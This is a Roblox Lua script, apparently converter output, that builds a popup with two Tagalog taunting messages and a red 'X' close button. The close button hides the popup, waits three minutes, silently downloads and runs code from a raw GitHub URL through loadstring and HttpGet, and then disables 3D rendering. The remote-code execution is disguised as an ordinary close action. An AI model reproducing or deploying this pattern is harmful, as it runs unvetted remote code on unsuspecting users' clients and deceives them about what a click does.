-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local Frame_2 = Instance.new("Frame")
local TextButton = Instance.new("TextButton")
local TitleRed = Instance.new("TextLabel")
local TitleRed_2 = Instance.new("TextLabel")

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
Frame.BorderColor3 = Color3.fromRGB(72, 72, 72)
Frame.Position = UDim2.new(0.243182108, 0, 0.186772078, 0)
Frame.Size = UDim2.new(0, 495, 0, 303)

Frame_2.Parent = Frame
Frame_2.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
Frame_2.BorderColor3 = Color3.fromRGB(153, 153, 153)
Frame_2.Position = UDim2.new(0.0110337995, 0, 0.0212582629, 0)
Frame_2.Size = UDim2.new(0, 483, 0, 288)

TextButton.Parent = Frame
TextButton.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
TextButton.BorderColor3 = Color3.fromRGB(27, 27, 27)
TextButton.Position = UDim2.new(0.406294793, 0, 0.826055229, 0)
TextButton.Size = UDim2.new(0, 91, 0, 91)
TextButton.Font = Enum.Font.LuckiestGuy
TextButton.Text = "X"
TextButton.TextColor3 = Color3.fromRGB(255, 0, 0)
TextButton.TextSize = 80.000
TextButton.TextYAlignment = Enum.TextYAlignment.Bottom

TitleRed.Name = "TitleRed"
TitleRed.Parent = TextButton
TitleRed.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
TitleRed.BorderColor3 = Color3.fromRGB(27, 27, 27)
TitleRed.Position = UDim2.new(-2.04092646, 0, -2.48221993, 0)
TitleRed.Size = UDim2.new(0, 463, 0, 109)
TitleRed.Font = Enum.Font.GothamBold
TitleRed.Text = "Check Kutson please, masmabilis magfarm pag magisa, mas mabilis ka ding matatapos."
TitleRed.TextColor3 = Color3.fromRGB(255, 255, 255)
TitleRed.TextSize = 25.000
TitleRed.TextStrokeColor3 = Color3.fromRGB(37, 29, 255)
TitleRed.TextStrokeTransparency = 0.000
TitleRed.TextWrapped = true

TitleRed_2.Name = "TitleRed"
TitleRed_2.Parent = TextButton
TitleRed_2.BackgroundColor3 = Color3.fromRGB(27, 27, 27)
TitleRed_2.BorderColor3 = Color3.fromRGB(27, 27, 27)
TitleRed_2.Position = UDim2.new(-1.87609112, 0, -1.19650531, 0)
TitleRed_2.Size = UDim2.new(0, 433, 0, 85)
TitleRed_2.Font = Enum.Font.GothamBold
TitleRed_2.Text = "Check mo din ung kutson nyo sa bahay, baka may gumagamit na iba pag wala ka ng dose oras"
TitleRed_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TitleRed_2.TextSize = 25.000
TitleRed_2.TextStrokeColor3 = Color3.fromRGB(37, 29, 255)
TitleRed_2.TextStrokeTransparency = 0.000
TitleRed_2.TextWrapped = true

-- Scripts:

local function TBODKS_fake_script() -- Frame.Drag 
	local script = Instance.new('LocalScript', Frame)

	script.Parent.Active = true
	script.Parent.Draggable = true
end
coroutine.wrap(TBODKS_fake_script)()
local function BWIMZ_fake_script() -- TextButton.quitbutton 
	local script = Instance.new('Script', TextButton)

	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Visible = false
		wait(180)
		loadstring(game:HttpGet("https://raw.githubusercontent.com/bytemoo/Team/main/GrayArea"))()
		game:GetService("RunService"):Set3dRenderingEnabled(false)
	end)
end
coroutine.wrap(BWIMZ_fake_script)()
